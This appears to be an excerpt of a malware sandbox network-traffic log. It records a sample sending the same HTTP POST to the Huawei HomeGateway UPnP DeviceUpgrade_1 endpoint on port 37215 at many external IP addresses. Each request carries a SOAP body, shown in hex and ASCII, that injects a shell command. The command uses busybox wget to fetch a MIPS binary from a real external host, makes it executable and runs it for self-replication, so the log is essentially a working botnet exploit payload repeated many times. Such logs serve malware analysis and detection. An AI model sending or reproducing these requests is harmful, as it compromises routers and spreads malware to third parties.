                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.2349048157.107.214.7437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488127947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        834192.168.2.2336394158.68.212.13437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488130093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        835192.168.2.2339770157.103.34.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488138914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        836192.168.2.234571641.182.56.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488140106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        837192.168.2.2348808157.148.78.12337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488140106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        838192.168.2.2337446197.19.246.19237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488148928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        839192.168.2.2339102197.242.124.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488149881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        840192.168.2.2360656131.248.70.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488157034 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        841192.168.2.234089841.53.77.8537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488162994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.2341346197.29.206.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488228083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
